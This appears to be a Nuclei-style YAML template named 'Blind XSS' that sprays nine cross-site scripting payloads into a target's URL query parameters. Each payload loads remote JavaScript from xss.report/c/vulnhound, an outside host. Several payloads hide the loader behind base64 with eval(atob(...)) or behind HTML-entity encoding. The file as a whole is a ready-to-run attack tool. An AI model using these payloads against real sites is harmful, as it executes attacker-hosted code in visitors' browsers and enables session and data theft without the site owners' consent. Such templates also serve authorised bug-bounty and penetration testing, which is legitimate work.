id: blind-xss

info:
  name: Blind XSS
  author: Vulnpire
  severity: medium
  description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired.
  tags: xss,blind,generic

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      injection:
      - '"><script src=//xss.report/c/vulnhound></script>'
      - '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9jL3Z1bG5ob3VuZCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsK onerror=eval(atob(this.id))>'
      - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/c/vulnhound\";document.body.appendChild(a)")'
      - '"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9jL3Z1bG5ob3VuZCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsK autofocus>'
      - '"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9jL3Z1bG5ob3VuZCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsK>'
      - '"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;xss.report/c/vulnhound&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">'
      - '<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//xss.report/c/vulnhound");a.send();</script>'
      - '<script>$.getScript("//xss.report/c/vulnhound")</script>'
      - 'var a=document.createElement("script");a.src="//xss.report/c/vulnhound";document.body.appendChild(a);'
      

    fuzzing:
      - part: query
        type: replace
        fuzz:
          - "{{injection}}"
